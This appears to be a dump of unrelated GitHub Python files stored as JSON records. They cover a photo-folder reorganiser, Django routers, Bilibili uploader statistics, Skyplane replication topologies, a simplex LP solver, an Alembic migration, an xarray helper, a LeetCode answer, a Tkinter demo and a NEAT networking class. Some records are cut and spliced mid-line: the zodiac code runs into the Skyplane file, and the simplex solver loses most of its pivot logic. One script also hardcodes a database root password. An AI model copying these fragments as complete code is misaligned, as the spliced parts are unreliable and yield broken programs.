\"September\": \"09\",\n \"October\": \"10\",\n \"November\": \"11\",\n \"December\": \"12\"\n }\n re_good = r\"^\\d\\d\\d\\d-\\d\\d-\\d\\d$\"\n re_match1 = r\".*(January|February|March|April|May|June|July|August|September|October|November|December) (\\d+), (\\d\\d\\d\\d)\"\n overall_good = True\n\n stats = {\"files_moved\": 0, \"files_renamed\": 0, \"mkdirs\": 0, \"rmdirs\": 0, \"stats_fake\": args.test}\n\n logger.info(\"starting sanity on: {}, test: {}, debug: {}\".format(args.dir, args.test, args.debug))\n dirs = [dI for dI in os.listdir(args.dir) if os.path.isdir(os.path.join(args.dir,dI))]\n for dir in dirs:\n orig_path = \"{}/{}\".format(args.dir, dir)\n if args.dir.endswith(\"/\"):\n orig_path = \"{}{}\".format(args.dir, dir)\n\n is_good = re.match(re_good, dir)\n is_match1 = re.match(re_match1, dir)\n dir_good = True if (is_good or is_match1) else False\n overall_good = overall_good and dir_good\n logger.debug(\"in: {}, is_good: {}, is_match1: {}, dir_good: {}\".format(dir, is_good, is_match1, dir_good))\n if is_good:\n logger.info(\"format is good, skipping: {}\".format(dir))\n elif is_match1:\n logger.info(\"handle match1: {}\".format(dir))\n groups = is_match1.groups()\n dst_folder = form_folder(is_match1.groups())\n if dst_folder is None:\n logger.error(\"skipping dir: {}\".format(dir))\n continue\n else:\n # make sure path exists\n dst_path = \"{}/{}\".format(args.dir, dst_folder)\n if args.dir.endswith(\"/\"):\n dst_path = \"{}{}\".format(args.dir, dst_folder)\n\n dst_folder_exists = os.path.isdir(dst_path)\n logger.info(\"{} exists: {}\".format(dst_folder, dst_folder_exists))\n if not dst_folder_exists:\n if args.test:\n logger.info(\"would mkdir: {}\".format(dst_path))\n else:\n logger.info(\"mkdir: {}\".format(dst_path))\n os.mkdir(dst_path)\n stats[\"mkdirs\"] = stats[\"mkdirs\"] + 1\n\n # move files over\n files = os.listdir(orig_path)\n for file in files:\n i = 0\n orig_file_path = \"{}/{}\".format(orig_path, file)\n dst_file_path = None\n dst_file_exists = True\n while(dst_file_exists):\n if i > 0:\n logger.info(\"increasing file rename for {}\".format(orig_file_path))\n stats[\"files_renamed\"] = stats[\"files_renamed\"] + 1\n dst_file_path = \"{}/{}{}\".format(dst_path, \"0\"*i, file)\n dst_file_exists = os.path.exists(dst_file_path)\n logger.debug(\"{} -> {}, dst_file_exists: {}\".format(orig_file_path, dst_file_path, dst_file_exists))\n i = i + 1\n if i > file_rename_limit:\n logger.error(\"file_rename_limit exceeded, something is busted\")\n sys.exit(1)\n if args.test:\n logger.info(\"would mv 
{} -> {}\".format(orig_file_path, dst_file_path))\n else:\n logger.info(\"mv {} -> {}\".format(orig_file_path, dst_file_path))\n os.rename(orig_file_path, dst_file_path)\n stats[\"files_moved\"] = stats[\"files_moved\"] + 1\n\n # delete src dir if empty\n if not os.listdir(orig_path):\n if args.test:\n logger.info(\"would rmdir {}\".format(orig_path))\n else:\n logger.info(\"rmdir {}\".format(orig_path))\n os.rmdir(orig_path)\n stats[\"rmdirs\"] = stats[\"rmdirs\"] + 1\n\n else:\n logger.warn(\"unhandled dir: {}\".format(dir))\n\n logger.info(stats)\n logger.info(\"overall_good: {}\".format(overall_good))\n","repo_name":"cheenpo/toolbox","sub_path":"a_better_photos_export.py","file_name":"a_better_photos_export.py","file_ext":"py","file_size_in_byte":5019,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"11292145079","text":"from rest_framework_nested import routers\n\nfrom . import viewsets\n\nrouter = routers.DefaultRouter()\nrouter.register('members', viewsets.MemberViewset)\n\nmember_router = routers.NestedSimpleRouter(\n parent_router=router,\n parent_prefix='members',\n lookup='member'\n)\nmember_router.register(\n prefix='fields',\n viewset=viewsets.MemberFieldViewset,\n basename='member-fields'\n)\n\nurlpatterns = router.urls\nurlpatterns += member_router.urls\n","repo_name":"hugoseabra/mailchimp-service","sub_path":"audience/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":451,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"34294257074","text":"import json\nimport pymysql\nimport math\nimport time\nfrom decimal import Decimal\n\n# 连接数据库\ndb=pymysql.connect(host='127.0.0.1', user='root', passwd='456789', db='biliup', port=3306, charset='utf8', cursorclass = pymysql.cursors.DictCursor)\ndb.autocommit(True)\ncursor=db.cursor()\n\n# 获取类型相关的统计\n# 先获取所有类型\ncursor.execute('select distinct category from biliup')\ncate=list(map(lambda x:x['category'],cursor.fetchall()))\ncate.remove('公告') #就一个人,情况也比较特殊,就不管他了\ncate.remove('无') #没有类型也不管了\nprint(cate)\n# 各类型的相关统计\ncategories={}\nfor cat in cate:\n\tcursor.execute('select count(*) as num,avg(follow) as follow,avg(fans) as fans,avg(video) as video,\\\n\t\t\t\t\tavg(playNum) as playNum from biliup where category = %s',cat)\n\tcategories[cat]=cursor.fetchone()\n\t# 性别比例需排除保密的up\n\tcursor.execute('select avg(sex) as sex from biliup where category = %s and sex != 0',cat)\n\tcategories[cat].update(cursor.fetchone())\nprint(categories)\n# 打印信息用于主页\nfor k,v in categories.items():\n\tprint(k+\":\"+str(v['num']))\ncategory=[]\n# 打印信息用于类型页面\nfor cat in categories:\n\t# 性别改为百分比\n\tcategories[cat]['sex']=(categories[cat]['sex']-1)*100\n\tfor x in categories[cat]:\n\t\tif x!='num':\n\t\t\t# Decimal转float\n\t\t\tcategories[cat][x]=float(categories[cat][x])\n\ty=categories[cat].copy()\n\tdel y['num']\n\ty['name']=cat\n\tcategory.append(y)\nprint(category)\n# 打印不分类的统计信息,用于类型页面的平均数\ncursor.execute('select avg(video) as video,avg(follow) as follow,avg(fans) as fans,avg(playNum) as playNum from biliup')\naverage=cursor.fetchone()\ncursor.execute('select avg(sex) as sex from biliup where sex != 0') #性别比例需排除保密的up\naverage.update(cursor.fetchone())\naverage['sex']=(average['sex']-1)*100 #性别改为百分比\nfor avg in average:\n\taverage[avg]=float(average[avg]) #Decimal转float\nprint(average)\n\n# 打印性别信息用于主页\nsexes={}\nfor sex in range(0,3):\n\tcursor.execute('select count(*) from biliup where sex = 
%s',sex)\n\tsexes[sex]=cursor.fetchone()['count(*)']\nprint(sexes)\n\n# Print level info for the home page\nlevels={}\nfor lev in range(0,7):\n\tcursor.execute('select count(*) from biliup where level = %s',lev)\n\tlevels[lev]=cursor.fetchone()['count(*)']\nprint(levels)\n\n# Print zodiac-sign info for the home page\ndate2star=[20,19,21,20,21,22,23,23,23,24,23,22]\nstar=[\"摩羯座\",\"水瓶座\",\"双鱼座\",\"白羊座\",\"金牛座\",\"双子座\",\"巨蟹座\",\"狮子座\",\"处女座\",\"天秤座\",\"天蝎座\",\"射手座\",\"摩羯座\"]\nstars={} # dict recording the count for each sign\nfor sta in star:\n\tstars[sta]=0 # initialize to 0\n# Fetch birthday info\ncursor.execute('select birth from biliup')\nbirth=list(map(lambda x:x['birth'],cursor.fetchall()))\nfor bir in birth:\n\t# skip birthdays that are private or left at the system default (01-01)\n\tif bir !=' none' and bir !='01-01':\n\t\t# convert birthday to zodiac sign\n\t\tbir=bir.split('-')\n\t\tmonth=int(bir[0])\n\t\tday=int(bir[1])\n\t\tsta=star[month-1] if day Dict:\n        \"\"\"Serialize to dict with type information.\"\"\"\n        return {\"type\": self.__class__.__name__, \"fields\": self.__dict__}\n\n    @classmethod\n    def from_dict(cls, topology_dict: Dict) -> \"ReplicationTopologyNode\":\n        \"\"\"Deserialize from dict with type information.\"\"\"\n        if topology_dict[\"type\"] == \"ReplicationTopologyGateway\":\n            return ReplicationTopologyGateway.from_dict_fields(topology_dict[\"fields\"])\n        elif topology_dict[\"type\"] == \"ReplicationTopologyObjectStore\":\n            return ReplicationTopologyObjectStore.from_dict_fields(topology_dict[\"fields\"])\n        else:\n            raise ValueError(\"Unknown topology node type: {}\".format(topology_dict[\"type\"]))\n\n    @classmethod\n    def from_dict_fields(cls, fields: Dict):\n        \"\"\"Deserialize from dict with type information.\"\"\"\n        return cls(**fields)\n\n\n@dataclass\nclass ReplicationTopologyGateway(ReplicationTopologyNode):\n    instance: int\n\n    def __hash__(self) -> int:\n        return hash((self.region, self.instance))\n\n\n@dataclass\nclass ReplicationTopologyObjectStore(ReplicationTopologyNode):\n    def __hash__(self) -> int:\n        return hash(self.region)\n\n\nclass ReplicationTopology:\n    \"\"\"\n    ReplicationTopology stores a DAG where nodes are an instance in a cloud region\n    (e.g. \"aws:us-east-1\", instance 0) and edges denote a connection to another\n    cloud region (e.g. 
64).\n \"\"\"\n\n def __init__(\n self,\n edges: Optional[List[Tuple[ReplicationTopologyNode, ReplicationTopologyNode, int]]] = None,\n cost_per_gb: Optional[float] = None,\n ):\n self.edges: List[Tuple[ReplicationTopologyNode, ReplicationTopologyNode, int]] = edges or []\n self.nodes: Set[ReplicationTopologyNode] = set(k[0] for k in self.edges) | set(k[1] for k in self.edges)\n self.cost_per_gb: Optional[float] = cost_per_gb\n\n @property\n def gateway_nodes(self) -> Set[ReplicationTopologyGateway]:\n return {n for n in self.nodes if isinstance(n, ReplicationTopologyGateway)}\n\n @property\n def obj_store_nodes(self) -> Set[ReplicationTopologyObjectStore]:\n return {n for n in self.nodes if isinstance(n, ReplicationTopologyObjectStore)}\n\n def add_instance_instance_edge(self, src_region: str, src_instance: int, dest_region: str, dest_instance: int, num_connections: int):\n \"\"\"Add relay edge between two instances.\"\"\"\n src_gateway = ReplicationTopologyGateway(src_region, src_instance)\n dest_gateway = ReplicationTopologyGateway(dest_region, dest_instance)\n self.edges.append((src_gateway, dest_gateway, int(num_connections)))\n self.nodes.add(src_gateway)\n self.nodes.add(dest_gateway)\n\n def add_objstore_instance_edge(self, src_region: str, dest_region: str, dest_instance: int):\n \"\"\"Add object store to instance node (i.e. source bucket to source gateway).\"\"\"\n src_objstore = ReplicationTopologyObjectStore(src_region)\n dest_gateway = ReplicationTopologyGateway(dest_region, dest_instance)\n self.edges.append((src_objstore, dest_gateway, 0))\n self.nodes.add(src_objstore)\n self.nodes.add(dest_gateway)\n\n def add_instance_objstore_edge(self, src_region: str, src_instance: int, dest_region: str):\n \"\"\"Add instance to object store edge (i.e. 
destination gateway to destination bucket).\"\"\"\n src_gateway = ReplicationTopologyGateway(src_region, src_instance)\n dest_objstore = ReplicationTopologyObjectStore(dest_region)\n self.edges.append((src_gateway, dest_objstore, 0))\n self.nodes.add(src_gateway)\n self.nodes.add(dest_objstore)\n\n def get_outgoing_paths(self, src: ReplicationTopologyNode):\n \"\"\"Return nodes that follow src in the topology.\"\"\"\n return {dest_gateway: num_connections for src_gateway, dest_gateway, num_connections in self.edges if src_gateway == src}\n\n def get_incoming_paths(self, dest: ReplicationTopologyNode):\n \"\"\"Return nodes that precede dest in the topology.\"\"\"\n return {src_gateway: num_connections for dest_gateway, src_gateway, num_connections in self.edges if dest_gateway == dest}\n\n def source_instances(self) -> Set[ReplicationTopologyGateway]:\n nodes = self.nodes - {v for u, v, _ in self.edges if not isinstance(u, ReplicationTopologyObjectStore)}\n return {n for n in nodes if isinstance(n, ReplicationTopologyGateway)}\n\n def sink_instances(self) -> Set[ReplicationTopologyGateway]:\n nodes = self.nodes - {u for u, v, _ in self.edges if not isinstance(v, ReplicationTopologyObjectStore)}\n return {n for n in nodes if isinstance(n, ReplicationTopologyGateway)}\n\n def source_region(self) -> str:\n instances = list(self.source_instances())\n assert all(\n i.region == instances[0].region for i in instances\n ), f\"All source instances must be in the same region, but found {instances}\"\n return instances[0].region\n\n def sink_region(self) -> str:\n instances = list(self.sink_instances())\n assert all(i.region == instances[0].region for i in instances), \"All sink instances must be in the same region\"\n return instances[0].region\n\n def per_region_count(self) -> Dict[str, int]:\n counts = {}\n for node in self.nodes:\n if isinstance(node, ReplicationTopologyGateway):\n counts[node.region] = counts.get(node.region, 0) + 1\n return counts\n\n def to_json(self):\n \"\"\"\n Returns a JSON representation of the topology.\n \"\"\"\n edges = []\n for e in self.edges:\n edges.append({\"src\": e[0].to_dict(), \"dest\": e[1].to_dict(), \"num_connections\": int(e[2])})\n return json.dumps(dict(replication_topology_edges=edges))\n\n @classmethod\n def from_json(cls, json_str: str):\n \"\"\"\n Returns a ReplicationTopology from a JSON string.\n \"\"\"\n in_dict = json.loads(json_str)\n assert \"replication_topology_edges\" in in_dict\n edges = []\n for edge in in_dict[\"replication_topology_edges\"]:\n edges.append(\n (ReplicationTopologyNode.from_dict(edge[\"src\"]), ReplicationTopologyNode.from_dict(edge[\"dest\"]), edge[\"num_connections\"])\n )\n return ReplicationTopology(edges)\n\n def to_graphviz(self):\n import graphviz as gv # pytype: disable=import-error\n\n # if dot is not installed\n has_dot = shutil.which(\"dot\") is not None\n if not has_dot:\n logger.error(\"Graphviz is not installed. 
Please install it to plot the solution (sudo apt install graphviz).\")\n return None\n\n g = gv.Digraph(name=\"throughput_graph\")\n g.attr(rankdir=\"LR\")\n subgraphs = {}\n for src_gateway, dest_gateway, n_connections in self.edges:\n # group node instances by region\n src_region, src_instance = (\n src_gateway.region,\n src_gateway.instance if isinstance(src_gateway, ReplicationTopologyGateway) else \"objstore\",\n )\n dest_region, dest_instance = (\n dest_gateway.region,\n dest_gateway.instance if isinstance(dest_gateway, ReplicationTopologyGateway) else \"objstore\",\n )\n src_region, dest_region = src_region.replace(\":\", \"/\"), dest_region.replace(\":\", \"/\")\n src_node = f\"{src_region}, {src_instance}\"\n dest_node = f\"{dest_region}, {dest_instance}\"\n\n # make a subgraph for each region\n if src_region not in subgraphs:\n subgraphs[src_region] = gv.Digraph(name=f\"cluster_{src_region}\")\n subgraphs[src_region].attr(label=src_region)\n if dest_region not in subgraphs:\n subgraphs[dest_region] = gv.Digraph(name=f\"cluster_{dest_region}\")\n subgraphs[dest_region].attr(label=dest_region)\n\n # add nodes\n subgraphs[src_region].node(src_node, label=str(src_instance), shape=\"box\")\n subgraphs[dest_region].node(dest_node, label=str(dest_instance), shape=\"box\")\n\n # add edges\n g.edge(\n src_node,\n dest_node,\n label=f\"{n_connections} connections\" if src_instance != \"objstore\" and dest_instance != \"objstore\" else None,\n )\n\n for subgraph in subgraphs.values():\n g.subgraph(subgraph)\n\n return g\n\n\n@dataclass\nclass ReplicationJob:\n source_region: str\n source_bucket: Optional[str]\n dest_region: str\n dest_bucket: Optional[str]\n\n # object transfer pairs (src, dest)\n transfer_pairs: List[Tuple[ObjectStoreObject, ObjectStoreObject]]\n\n # progress tracking via a list of chunk_requests\n chunk_requests: Optional[List[ChunkRequest]] = None\n\n # Generates random chunks for testing on the gateways\n random_chunk_size_mb: Optional[int] = None\n\n @property\n def transfer_size(self):\n if not self.random_chunk_size_mb:\n return sum(source_object.size for source_object, _ in self.transfer_pairs)\n else:\n return self.random_chunk_size_mb * len(self.transfer_pairs) * MB\n","repo_name":"c3lab-net/skyplane","sub_path":"skyplane/replicate/replication_plan.py","file_name":"replication_plan.py","file_ext":"py","file_size_in_byte":9630,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"5"} +{"seq_id":"866447429","text":"# external links, package imports, file paths etc.\nimport os\n\n### CSV FILE DIRECTORY\n\ncsv_dir = os.path.abspath((os.path.dirname( __file__ )))\n\n### BFI URL\n\nvoterlist_url = 'http://www.bfi.org.uk/films-tv-people/sightandsoundpoll2012/voters'\nfilm_url = 'http://www.bfi.org.uk/films-tv-people/'\n","repo_name":"charlloyd/film-gaze","sub_path":"config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":294,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"23355108453","text":"# simplex.py\n\"\"\"\n\n\n<1/26/17>\n\"\"\"\n\nimport numpy as np\n\n# Problems 1-6\nclass SimplexSolver(object):\n \"\"\"Class for solving the standard linear optimization problem\n\n maximize c^Tx\n subject to Ax <= b\n x >= 0\n via the Simplex algorithm, as long as the problem is feasible at the origin\n \"\"\"\n\n def __init__(self, c, A, b):\n \"\"\"\n\n Parameters:\n c (1xn ndarray): The coefficients of the linear objective function.\n A (mxn ndarray): The constraint 
coefficients matrix.\n            b (1xm ndarray): The constraint vector.\n\n        Raises:\n            ValueError: if the given system is infeasible at the origin.\n        \"\"\"\n        #Check feasibility.\n        x=np.zeros_like(c)\n        m,n=np.shape(A)\n        c = c.reshape(len(c),1)\n        b = b.reshape(len(b),1)\n\n        if np.all(np.less_equal(A.dot(x),b)): #x=0 ==> Ax= 0:\n                best_ratio = my_ratio\n                pivot_row = row_element\n\n        return pivot_row\n\n    #This is how we pivot\n    def pivot(self, pivot_row, pivot_col):\n        tab = self.Tableau\n        pivot_entry = tab[pivot_row,pivot_col]\n\n        #Divide the pivot row by the value of the pivot entry\n        tab[pivot_row] /= pivot_entry\n\n        #Use the pivot row to zero out all entries in the pivot column above and below the pivot entry\n        for row in range(len(tab)):\n            if row != pivot_row:\n                tab[row] -= (tab[row, pivot_col]/tab[pivot_row,pivot_col])*(tab[pivot_row])\n\n        return tab\n\n    def solve(self):\n        \"\"\"Solve the linear optimization problem.\n\n        Returns:\n            (float) The maximum value of the objective function.\n            (dict): The basic variables and their values.\n            (dict): The nonbasic variables and their values.\n        \"\"\"\n\n        #First, if it's unbounded raise an error\n        if np.all(self.Tableau[:,1:] <=0):\n            raise ValueError(\"This problem is unbounded\") #Don't mark this wrong, Koa said it's right\n\n        #This gets our final tableau\n        final_answer = self.pivot(self.pivot_row(), self.pivot_col())\n        while np.any(self.Tableau[0]<0):\n            final_answer = self.pivot(self.pivot_row(), self.pivot_col())\n\n        #optimal value\n        optimal_value = final_answer[0,0]\n\n        #Initialize our dictionaries\n        basic_variables = dict()\n        nonbasic_variables = dict()\n\n        #Update our dictionaries\n        for i in range(len(final_answer[0,1:])):\n            i+=1\n            if final_answer[0,i]==0:\n                index = np.argmax(final_answer[:,i])\n                basic_variables[i-1] = final_answer[index,0]\n            else:\n                nonbasic_variables[i-1] = 0\n\n        #Return optimal, basic, nonbasic\n        return optimal_value, basic_variables, nonbasic_variables\n\n\n\n\n# Problem 7\ndef prob7(filename='Data/productMix.npz'):\n    \"\"\"Solve the product mix problem for the data in 'productMix.npz'.\n\n    Parameters:\n        filename (str): the path to the data file.\n\n    Returns:\n        The minimizer of the problem (as an array).\n    \"\"\"\n    #Get our variables\n    mix = np.load(filename)\n    A = mix['A']\n    p = mix['p']\n    lp = len(p)\n    p=p.reshape((lp,1))\n    m = mix['m']\n    lm = len(m)\n    m = m.reshape((lm,1))\n    d = mix['d']\n    ld = len(d)\n    d = d.reshape((ld,1))\n\n    #Let it begin\n    c = np.array(p)\n    A = np.vstack((A, np.eye(len(d))))\n    b = np.vstack((m, d))\n\n\n    answer = SimplexSolver(c,A,b).solve()\n    my_dict = answer[1]\n    final_answer = np.array([my_dict[0],my_dict[1],my_dict[2],my_dict[3]])\n    return final_answer\n\n","repo_name":"jafekb/projects","sub_path":"Optimization/simplex.py","file_name":"simplex.py","file_ext":"py","file_size_in_byte":5020,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} {"seq_id":"7845119810","text":"\"\"\"added scheme and item groups\n\nRevision ID: add5acbedeb5\nRevises: 1f22485ea3c6\nCreate Date: 2021-11-27 12:34:27.765136\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\n\n\n# revision identifiers, used by Alembic.\nrevision = 'add5acbedeb5'\ndown_revision = '1f22485ea3c6'\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n    # ### commands auto generated by Alembic - please adjust! 
###\n op.create_table('item_groups',\n sa.Column('id', sa.Integer(), autoincrement=True, nullable=False),\n sa.Column('name', sa.String(), nullable=False),\n sa.Column('created_at', sa.DateTime(timezone=True), nullable=False),\n sa.Column('user_id', sa.Integer(), nullable=True),\n sa.Column('subject_id', sa.Integer(), nullable=True),\n sa.Column('is_active', sa.Boolean(), nullable=True),\n sa.ForeignKeyConstraint(['subject_id'], ['subjects.id'], ),\n sa.ForeignKeyConstraint(['user_id'], ['users.id'], ),\n sa.PrimaryKeyConstraint('id')\n )\n op.create_table('specifications',\n sa.Column('id', sa.Integer(), autoincrement=True, nullable=False),\n sa.Column('created_at', sa.DateTime(timezone=True), nullable=False),\n sa.Column('user_id', sa.Integer(), nullable=True),\n sa.ForeignKeyConstraint(['user_id'], ['users.id'], ),\n sa.PrimaryKeyConstraint('id')\n )\n # ### end Alembic commands ###\n\n\ndef downgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.drop_table('specifications')\n op.drop_table('item_groups')\n # ### end Alembic commands ###\n","repo_name":"MTC-Thailand/exam","sub_path":"migrations/versions/add5acbedeb5_added_scheme_and_item_groups.py","file_name":"add5acbedeb5_added_scheme_and_item_groups.py","file_ext":"py","file_size_in_byte":1517,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"31756852696","text":"import xarray as xr\nimport numpy as np\n\n\n# def monotone_divide(x: xr.DataArray or xr.Dataset, dim=None):\n# if dim is None:\n# raise ValueError('dim needs to be specified.')\n# dx = x.diff(dim)\n# print(x)\n# incr = dx > 0\n# right_end = (incr != incr.shift({dim: -1})).pad({dim: (1, 0)}, constant_values=False)\n# # left_end = (incr != incr.shift({dim: 1})).pad({dim: (1, 0)}, constant_values=False)\n# # print(x.where(arange(x.sizes[dim]), drop=True))\n# print(x[dim].where(right_end, drop=True))\n\n\nfrom typing import Iterable, Dict\n\n\ndef slice_accumulate(x: xr.Dataset or xr.DataArray, edges: Dict[str, Iterable[float]], method='sum'):\n for key, value in edges.items():\n coord_range_edges = list(zip(value, value[1::]))\n coord_ranges = [slice(*edge_pair, None) for edge_pair in coord_range_edges]\n slices_one_dimension = [x.sel({key: coord_range}) for coord_range in coord_ranges]\n if method == 'mean':\n slices_one_dimension = [el.mean(key) for el in slices_one_dimension]\n elif method == 'sum':\n slices_one_dimension = [el.sum(key) for el in slices_one_dimension]\n x = xr.concat(slices_one_dimension, key)\n x = x.assign_coords({key: [str(x) for x in coord_range_edges]})\n return x\n\n\nxr.DataArray.slice_accumulate = slice_accumulate\nxr.Dataset.slice_accumulate = slice_accumulate\n\n\nif __name__ == '__main__':\n import matplotlib.pyplot as plt\n a = np.linspace(-5, 5, 11)\n b = np.linspace(-7, 7, 15)\n A, B = np.meshgrid(a, b, indexing='ij')\n C = A**2+B**2\n array = xr.DataArray(C, dims=('x', 'y'), coords={'x': a, 'y': b})\n slice_accumulate(array, {'x': [-5, -2, 3, 5], 'y': [-7, -4, 2, 5]}, method='mean').plot(x='x', y='y')\n plt.show()\n","repo_name":"mrschweizer/PyThat","sub_path":"src/PyThat/helpers/ROI.py","file_name":"ROI.py","file_ext":"py","file_size_in_byte":1771,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"5"} +{"seq_id":"22460279951","text":"class Solution(object):\n \"\"\"\n This is an example of prefix-sum problem. We are counting the number of subarrays\n that have sum of S. We know that A[0, j] = A[0] + A[1] + ... 
+ A[j], and therefore\n A[i, j] = A[0, j] - A[0, i]. The number of i, j pairs that satisfy A[i, j] = S is\n what we are looking for. We can use an array of size N + 1 to keep track the num\n of subarrays that sum to its array index. For example, pre_sum[3] = 5 means that\n there are 5 A[0, i] subarrays that sum to its index, 3. By re-arranging the\n equation from earlier, we get A[0, i] = A[0, j] - A[i, j]. For each iteration, we\n calculate the current sum minus our target S, A[0, j] - S, which equals to A[0, i],\n the remaining sum. Then, we can look up pre_sum table to find out how many\n subarrays have the sum of A[0, i].\n \"\"\"\n\n def numSubarraysWithSum(self, a, s):\n \"\"\"\n :type A: List[int]\n :type S: int\n :rtype: int\n \"\"\"\n total = 0 # number of valid subarrays sums to s\n curr_sum = 0 # sum of a[0, i]\n pre_sum = [0] * (len(a) + 1) # remember number of arrays sums to its index\n pre_sum[0] = 1 # let the number of subarray that sums to 0 be 1\n \n for i in range(len(a)):\n curr_sum += a[i]\n if curr_sum >= s:\n total += pre_sum[curr_sum - s]\n pre_sum[curr_sum] += 1\n \n return total","repo_name":"hsuanhauliu/leetcode-solutions","sub_path":"medium/binary-subarrays-with-sum/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":1452,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"21728166764","text":"from tkinter import *\r\n\r\nroot = Tk()\r\nroot.title(\"Buttons\")\r\n\r\n\r\n# making function\r\ndef callback():\r\n label.config(text=\"You clicked me!\", fg=\"red\", bg=\"yellow\")\r\n button[\"state\"] = \"disabled\" # disabling the button\r\n\r\n\r\n# creating the label\r\nlabel = Label(root, text=\"Hello python\")\r\nlabel.pack()\r\n\r\n# creating button with command\r\nbutton = Button(root, text=\"Click Me!\", command=callback)\r\n\r\nbutton.pack()\r\n\r\nroot.geometry(\"400x400\")\r\nroot.mainloop()\r\n","repo_name":"reeda8940/Python","sub_path":"Gui basics/Button with function.py","file_name":"Button with function.py","file_ext":"py","file_size_in_byte":461,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"13564296713","text":"from typing import Dict, List\n\nfrom bson import ObjectId\nimport copy\n\nfrom NEAT.ErrorHandling.Exceptions.NetworkProtocolException import NetworkProtocolException\nfrom NEAT.ErrorHandling.Exceptions.NetworkTimeoutException import NetworkTimeoutException\nfrom NEAT.GenomeStructures.StorageStructure.StorageGenome import StorageGenome\nfrom NEAT.Networking.Commands.BaseCommand import BaseCommand\nfrom NEAT.Networking.Server.NEATServer import NEATServer\n\n\nclass SimulationConnector(object):\n \"\"\"\n A class providing a high-level interface to\n a client connected via the NEATClient.\n It receives commands from NEATServer's message\n queue und responds to them.\n When a function from SimulationConnector is called,\n the client is expected to have sent a certain command\n (if there are no commands in the message queue, the Server\n will wait for the next command to be received). 
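The wait can be bounded with the timeout argument of _listen_for_command, which raises NetworkTimeoutException when it expires. 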
If the\n    client has sent another command, or a command where\n    the expected parameters are not present,\n    NetworkProtocolException will be raised.\n    \"\"\"\n\n    def __init__(self) -> None:\n        self._server = NEATServer()  # type: NEATServer\n\n    def _listen_for_command(\n            self,\n            command_type: str,\n            parameter_filter: Dict[str, object]=None,\n            timeout: int = None\n    ) -> BaseCommand:\n        \"\"\"\n        Waits for the message queue to have a command ready,\n        pops the command from the queue and inspects it.\n        Returns the received command if its type and parameters\n        match the expected type / filter.\n        If the next received command does not match,\n        NetworkProtocolException is raised.\n        :param command_type: The type of the expected command as string\n        :param parameter_filter: A dictionary of parameters that are expected to be\n        present in the command's parameters.\n        :param timeout: The timeout after which the attempt to get\n        the command will fail\n        :return: The received command object\n        \"\"\"\n        # TODO: timeouts, more error handling\n        command = self._server.fetch(timeout)\n        print(\"Received: \", command)\n        if not command:\n            raise NetworkTimeoutException\n\n        if not command.type == command_type:\n            self._respond_to_command(command, acknowledged=False)\n            raise NetworkProtocolException(\n                \"Wrong command type encountered: \" +\n                command.type +\n                \", expected \" +\n                command_type +\n                \".\"\n            )\n\n        if parameter_filter:\n            for key, value in parameter_filter.items():\n                if key not in command.parameters.keys():\n                    self._respond_to_command(command, acknowledged=False)\n                    raise NetworkProtocolException(\"Filter key not in command parameters\")\n                if not value == command.parameters[key]:\n                    self._respond_to_command(command, acknowledged=False)\n                    raise NetworkProtocolException(\"Filter values do not match in command parameters\")\n\n        return command\n\n    def _respond_to_command(\n            self,\n            command: BaseCommand,\n            result: Dict[str, object]=None,\n            acknowledged: bool=True,\n            timeout: int=2000\n    ) -> None:\n        \"\"\"\n        Sends the altered command object of a previously\n        received command back to the client.\n        The command object that is sent back to the client\n        should always be the same object that had been received\n        from the client.\n        The results of the command execution are passed back to the client\n        inside the command.result dictionary. If this dictionary\n        isn't present in the passed command, it will be created.\n        All commands that are passed back to the client and that\n        have been handled by the server contain an 'acknowledged'\n        field inside results. 
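For example, a command that was handled successfully comes back carrying result == {'acknowledged': True} merged with any payload set by the handler. 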
If this is set to true, the command\n        has been executed and the networking protocol hasn't been\n        breached.\n        :param command: The command object that is sent back\n        to the client\n        :param result: The result dictionary to be attached to\n        the command before it's sent back\n        :param acknowledged: Whether the command has been\n        acknowledged by the server\n        :param timeout: The timeout after which the send operation\n        will fail if the client hasn't connected yet\n        :return: None\n        \"\"\"\n        if result is None:\n            result = dict({})\n        command.result = result\n        command.result[\"acknowledged\"] = acknowledged\n        self._server.respond(command)\n\n    def get_session(self) -> Dict[str, object]:\n        \"\"\"\n        Awaits the AnnounceSession command to be sent by the client.\n        :return: The session parameters for the new simulation session\n        \"\"\"\n        session_command = self._listen_for_command(\"AnnounceSession\")\n        self._respond_to_command(session_command)\n        return session_command.parameters\n\n    def send_block(\n            self,\n            block: List[StorageGenome],\n            block_id: int\n    ) -> None:\n        \"\"\"\n        Awaits the GetBlock command to be sent by the client\n        and sends the block to the client.\n        :param block: The List of StorageGenomes to be sent to the client\n        :param block_id: The id (0 - block_count) of the block to be sent\n        :return: None\n        \"\"\"\n        block_to_send = {\n            genome.genome_id.__str__():\n                {\n                    input_label: None\n                    for input_label in genome.inputs.keys()\n                }\n            for genome in block\n        }\n        result = {\n            \"block\": block_to_send,\n            \"block_id\": block_id,\n            \"next_block_id\": block_id + 1,\n            \"block_size\": len(list(block_to_send.keys()))\n        }\n\n        get_command = self._listen_for_command(\"GetBlock\", {\"block_id\": block_id})\n        print(\"Sending block: \", result)\n        self._respond_to_command(\n            get_command,\n            result\n        )\n\n    def get_block_inputs(\n            self,\n            block_id: int\n    ) -> Dict[ObjectId, Dict[str, float]]:\n        \"\"\"\n        Awaits the SetInputs command to be sent by the client.\n        :param block_id: The id of the block whose inputs\n        should be received\n        :return: The received inputs as Dictionary of\n        genome_id: Dict[input_label: 